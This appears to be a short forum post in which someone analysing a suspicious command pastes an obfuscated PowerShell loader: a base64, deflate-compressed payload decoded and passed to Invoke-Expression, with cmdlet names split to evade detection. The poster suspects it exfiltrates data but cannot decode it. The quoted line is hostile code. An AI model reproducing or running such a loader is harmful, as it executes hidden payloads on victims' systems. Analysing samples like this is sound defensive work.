Update:
This is a command to execute a base 64 encoded string as a command. The encoded command is
( .(‘nEw’+’-OB’+‘j’+‘ect’) SYSTem.io.COMPREsSiON.deflATeSTREAm([syStem.IO.MEMOrYstreAm][sYSTeM.CONVerT]::FRoMBase64strinG('TZBBT8JAFITvJv6HPdRsm8pWFCGlaYyhhGzEQgDFRE0o5bVdLd1Nd6FA0/9uTQC9vHeZmcw3Gt1TETxNkYvw8zQqXgfY0V5EIeZzV4Ns291IyEXOI5aCiT+wqR0NJiawg1rMW5H9snKJjjNsYigavH7LLwgVNpAPi9mCzGG56A0Z+DNH224m3ujx0HNxopToWtaByXUA6QpWOQtJyNeW3BfcimLOCyIS8ZC6exDynsS7FBMpUqZ0fIUNJ+I5BGGia3Qs1i2fzRHL0DnfKFW+L4/tiMcLP+WBF9G0/2e4RkdUw6ER0vWaYQCqQWsABfVZ1wQnBUn7/kAlqBEDurU7HQOV7x4L4oxLxUJJxjkPQcrPbnc6CyZKPycv65bfTlWFgQqTsqocRPtv+r9i2XAUeFOV0yzWT6M0b2zStNuk2W6Rjm3d/Q6BDcO5vPgB') ,[sYsTem.io.cOMpReSsiON.CompressIONMODE]::DECompreSS )|&('f'+'ore'+'acH'){ &('NEW-ob'+'J'+'EcT') io.STreamREADER(_,[sySTem.TExT.ENcodInG]::asCii) }|.('ForEa'+'C'+'H'){_.readtoend() } ) |.(‘I’+‘E’ + ‘X’)
It appears there is another layer of embedded base 64 string but I can’t figure this out. It is seriously obfuscated. I am guessing it is trying to send some data to somewhere, but I can’t figure out what data or where it wants to go.